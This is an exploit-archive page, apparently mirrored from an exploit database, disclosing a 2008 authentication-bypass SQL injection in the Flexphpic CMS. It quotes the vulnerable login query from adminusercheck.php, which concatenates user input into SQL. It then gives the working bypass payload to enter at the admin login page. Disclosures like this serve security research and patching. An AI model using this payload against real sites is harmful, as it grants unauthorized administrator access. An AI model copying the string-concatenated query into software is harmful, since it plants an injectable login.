[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Flexphpic 0.0.x (Auth Bypass) SQL Injection Vulnerability
# Published : 2008-12-30
# Author : S.W.A.T.
# Previous Title : PowerClan 1.14a (Auth Bypass) SQL Injection Vulnerability
# Next Title : CMScout 2.06 SQL Injection/Local File Inclusion Vulnerabilities


#############################################
Autore: S.W.A.T.
Email: svvateam@yahoo.com
Site: Www.BaTLaGH.coM
Cms: Flexphpic 0.0.4 & Flexphpic Pro 0.0.3
Download: http://www.china-on-site.com/flexphpic/downloads.php
##############################################
Bug In adminusercheck.php
$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";
Exploit:
 
Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1
 
I'll Be   A C I D A L !!!

# www.Syue.com [2008-12-30]